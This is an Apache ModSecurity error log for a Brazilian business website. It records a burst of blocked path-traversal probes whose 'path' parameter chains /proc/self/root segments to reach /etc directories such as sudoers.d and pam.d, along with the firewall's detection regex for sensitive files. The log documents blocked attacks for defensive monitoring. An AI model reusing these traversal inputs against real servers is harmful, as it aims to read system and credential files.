[Tue Mar 17 14:10:04.611592 2026] [:error] [pid 2598:tid 140411590858496] [client 74.7.241.31:35938] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmK7Bj0p0SRWAqcjGF5zAAAAxI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:10:06.060311 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.241.31:35940] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmK7tY0UrI5A3LftIz7yAAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:10:09.189505 2026] [:error] [pid 29359:tid 140411699963648] [client 74.7.241.31:43994] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmK8aSy22zYCMGxsIlc5QAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:10:11.041538 2026] [:error] [pid 6296:tid 140411616036608] [client 74.7.241.31:44000] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmK83Ik7brgkOH-rIWMLgAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:10:12.672957 2026] [:error] [pid 2598:tid 140411632822016] [client 74.7.241.31:44002] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmK9Bj0p0SRWAqcjGF5zgAAAw0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:10:15.200603 2026] [:error] [pid 30223:tid 140411725141760] [client 74.7.241.31:44018] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmK98T4LuLykoMK_89ovgAAA4I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:10:23.152242 2026] [proxy_fcgi:error] [pid 9299:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:32856] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:10:25.387266 2026] [:error] [pid 2598:tid 140411548894976] [client 74.7.241.31:39524] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLARj0p0SRWAqcjGF53wAAAxc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:10:27.157938 2026] [:error] [pid 6296:tid 140411666392832] [client 74.7.241.31:39528] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLA3Ik7brgkOH-rIWMLwAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:10:28.642997 2026] [:error] [pid 7004:tid 140411725141760] [client 74.7.241.31:55860] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLBMU6Sx0TG1YjmQiu9gAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:10:30.204878 2026] [:error] [pid 6296:tid 140411548894976] [client 74.7.241.31:55866] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLBnIk7brgkOH-rIWMMAAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:10:33.427078 2026] [:error] [pid 29151:tid 140411641214720] [client 74.7.241.31:55882] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLCfPqhzTj3BvfDX-IKgAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:10:36.795160 2026] [:error] [pid 29151:tid 140411674785536] [client 74.7.241.31:55882] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLDPPqhzTj3BvfDX-IMAAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:10:45.137781 2026] [proxy_fcgi:error] [pid 2473:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:33674] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:10:46.422804 2026] [:error] [pid 2598:tid 140411666392832] [client 74.7.243.128:52820] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLFhj0p0SRWAqcjGF6CQAAAwk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:10:46.979433 2026] [:error] [pid 2598:tid 140411565680384] [client 74.7.243.128:52820] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLFhj0p0SRWAqcjGF6CgAAAxU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:10:47.739020 2026] [:error] [pid 9299:tid 140411708356352] [client 74.7.241.31:57780] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLF7-sgTmmJoPuMdy2xAAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:10:49.198171 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.241.31:57784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLGdY0UrI5A3LftIz7zwAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:10:49.559515 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.241.31:57784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLGdY0UrI5A3LftIz70AAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:10:52.253007 2026] [:error] [pid 2473:tid 140411565680384] [client 74.7.241.31:57800] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLHKBJNF7axNlVR0UXHQAAABU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:10:54.038728 2026] [:error] [pid 11293:tid 140411716749056] [client 74.7.241.31:57812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLHtCmCSWTlPouqorkuAAAAMM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:10:57.019118 2026] [:error] [pid 17965:tid 140411565680384] [client 74.7.241.31:57820] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLIat8Nd0UC_OcbVHLXQAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:10:58.362415 2026] [:error] [pid 28879:tid 140411691570944] [client 74.7.241.31:50300] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLIlDN3UhJjLukrK-LrgAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:06.149796 2026] [proxy_fcgi:error] [pid 2598:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:34520] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:11:08.727838 2026] [core:alert] [pid 28879:tid 140411557287680] [client 74.7.243.128:45478] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
